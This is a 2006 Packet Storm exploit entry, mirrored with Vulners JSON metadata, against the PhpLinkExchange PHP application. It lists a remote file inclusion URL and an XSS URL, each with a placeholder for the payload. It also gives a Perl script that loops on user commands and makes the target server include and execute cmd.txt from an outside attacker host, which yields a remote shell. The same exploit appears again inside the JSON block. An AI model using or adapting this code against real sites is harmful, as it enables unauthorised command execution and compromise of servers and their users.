Search...

phplinkexchange.txt

2006-09-13T00:00:00

ID PACKETSTORM:49915
Type packetstorm
Reporter s3rv3r_hack3r
Modified 2006-09-13T00:00:00

Description

                                        
                                            `vendor :www.idevspot.com  
Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange  
By : s3rv3r_hack3r  
www: hackerz.ir & h4ckerz.com  
remote file include :  
http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]  
xss:  
http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]  
remote command Exploit :   
#!/usr/bin/perl  
#  
# Exploit by s3rv3r_hack3r  
######################################################  
# ___ ___ __ #  
# / | \_____ ____ | | __ ___________________ #  
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #  
#\ Y // __ \\ \___| &lt;\ ___/| | \// / #  
# \___|_ /(____ )\___ &gt;__|_ \\___ &gt;__| /_____ \ #  
# \/ \/ \/ \/ \/ \/ #  
# Iran Hackerz Security Team #  
# WebSite: www.hackerz.ir & www.h4ckerz.com  
######################################################  
use LWP::Simple;  
  
print "-------------------------------------------\n";  
print "= Iran hacekerz security team =\n";  
print "= By s3rv3r_hack3r - www.hackerz.ir =\n";  
print "-------------------------------------------\n\n";  
  
print "Target &gt;http://";  
chomp($targ = &lt;STDIN&gt;);  
print "your web site name &gt;";  
chomp($cmd= &lt;STDIN&gt;);  
  
  
$con=get("http://".$targ."/bits_listings.php") || die "[-]Cannot connect to Host";   
while ()   
{   
print "command\$";  
chomp($cmd=&lt;STDIN&gt;);  
$commd=get("http://".$targ."/bits_listings.php?svr_rootPhpStart=http://www.hackerz.ir/cmd.txt?cmd=".$cmd)  
}  
+++++  
`

JSON Vulners Source

Initial Source

{"lastseen": "2016-11-03T10:22:41", "references": [], "description": "", "reporter": "s3rv3r_hack3r", "published": "2006-09-13T00:00:00", "type": "packetstorm", "title": "phplinkexchange.txt", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:22:41", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:41", "rev": 2}, "vulnersScore": -0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-09-13T00:00:00", "id": "PACKETSTORM:49915", "href": "https://packetstormsecurity.com/files/49915/phplinkexchange.txt.html", "viewCount": 3, "sourceData": "`vendor :www.idevspot.com \nDemo : www.idevspot.com/demo/PhpStart/PhpLinkExchange \nBy : s3rv3r_hack3r \nwww: hackerz.ir & h4ckerz.com \nremote file include : \nhttp://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?] \nxss: \nhttp://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss] \nremote command Exploit : \n#!/usr/bin/perl \n# \n# Exploit by s3rv3r_hack3r \n###################################################### \n# ___ ___ __ # \n# / | \\_____ ____ | | __ ___________________ # \n#/ ~ \\__ \\ _/ ___\\| |/ // __ \\_ __ \\___ / # \n#\\ Y // __ \\\\ \\___| <\\ ___/| | \\// / # \n# \\___|_ /(____ )\\___ >__|_ \\\\___ >__| /_____ \\ # \n# \\/ \\/ \\/ \\/ \\/ \\/ # \n# Iran Hackerz Security Team # \n# WebSite: www.hackerz.ir & www.h4ckerz.com \n###################################################### \nuse LWP::Simple; \n \nprint \"-------------------------------------------\\n\"; \nprint \"= Iran hacekerz security team =\\n\"; \nprint \"= By s3rv3r_hack3r - www.hackerz.ir =\\n\"; \nprint \"-------------------------------------------\\n\\n\"; \n \nprint \"Target >http://\"; \nchomp($targ = <STDIN>); \nprint \"your web site name >\"; \nchomp($cmd= <STDIN>); \n \n \n$con=get(\"http://\".$targ.\"/bits_listings.php\") || die \"[-]Cannot connect to Host\"; \nwhile () \n{ \nprint \"command\\$\"; \nchomp($cmd=<STDIN>); \n$commd=get(\"http://\".$targ.\"/bits_listings.php?svr_rootPhpStart=http://www.hackerz.ir/cmd.txt?cmd=\".$cmd) \n} \n+++++ \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/49915/phplinkexchange.txt"}